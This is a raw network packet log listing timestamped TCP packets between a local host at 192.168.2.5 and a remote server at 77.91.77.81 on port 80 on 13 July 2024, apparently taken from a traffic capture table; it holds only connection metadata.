                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497277975 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497278929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497278929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497309923 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497335911 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497356892 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497389078 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497423887 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497456074 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497483969 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497483969 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497490883 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497498035 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497505903 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497525930 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497560024 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497592926 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497628927 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497659922 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497692108 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497723103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497723103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497723103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497723103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497723103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497728109 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497741938 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497741938 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497762918 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497797966 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497834921 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497865915 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497900009 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497932911 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497952938 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497952938 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497952938 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497952938 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497953892 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497967005 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497972012 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.497981071 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498002052 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498037100 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498073101 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498176098 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498176098 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498176098 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498176098 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498178959 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498229980 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498231888 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498265982 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498282909 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498300076 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498318911 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498336077 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498349905 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498385906 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498503923 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498550892 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498565912 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498599052 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498617887 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498647928 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498665094 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498698950 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498714924 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498749971 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498754025 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498785973 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498800993 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498821974 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498837948 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498855114 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498874903 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498888969 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498902082 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498923063 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498940945 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498958111 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498970985 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.498992920 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499003887 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499031067 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499041080 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499067068 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499083042 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499104023 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499123096 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499136925 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499155998 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499171019 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499191046 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499205112 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499216080 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499239922 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499254942 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499272108 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499291897 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499308109 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499322891 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499342918 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499360085 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499377966 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499397039 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499413013 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499428034 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499460936 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499481916 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499535084 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499562979 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499594927 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499614000 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499630928 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499643087 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499681950 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499778986 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499813080 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499830961 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499845028 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499859095 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499880075 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499897003 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499913931 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499932051 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499948978 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499959946 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499984980 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.499999046 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500034094 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500099897 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500134945 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500153065 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500168085 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500181913 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500200987 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500212908 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500236034 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500246048 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500269890 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500288010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500305891 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500324011 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500339985 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500353098 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.500396013 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.532990932 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533093929 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533152103 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533205032 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533237934 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533272982 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533276081 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533277035 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533277035 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533307076 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533359051 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533391953 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533442974 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533467054 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533477068 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533490896 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533490896 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533514023 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533524990 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533550024 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533567905 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533586025 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533587933 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533620119 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533639908 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533654928 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533679008 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533684969 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533703089 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533719063 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533731937 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533759117 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533771992 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533793926 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533819914 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533828020 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533844948 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533862114 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533880949 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.533910990 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.534128904 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.534162998 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.534189939 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.534225941 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545178890 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545305014 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545342922 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545378923 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545412064 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545412064 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545412064 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545413017 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545442104 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545449972 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545478106 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545486927 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545521975 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.545543909 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546185017 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546253920 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546289921 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546329021 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546355009 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546355963 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546370983 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546403885 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546403885 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546410084 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546442986 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546448946 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546487093 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.546505928 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608243942 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608370066 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608406067 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608438969 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608468056 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608468056 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608474970 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608510971 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608510971 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608546972 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608547926 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608588934 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608767986 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608767986 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608932018 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.608989954 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609021902 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609077930 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609077930 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609101057 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609153032 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609186888 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609217882 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609222889 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609250069 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609277964 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609281063 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609314919 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609348059 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609352112 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609380960 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609416962 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609421968 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609456062 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609488010 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609491110 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609520912 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609527111 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609555960 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609561920 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609594107 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609596968 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609637022 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609652996 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609870911 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609932899 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.609936953 CEST804970477.91.77.81192.168.2.5
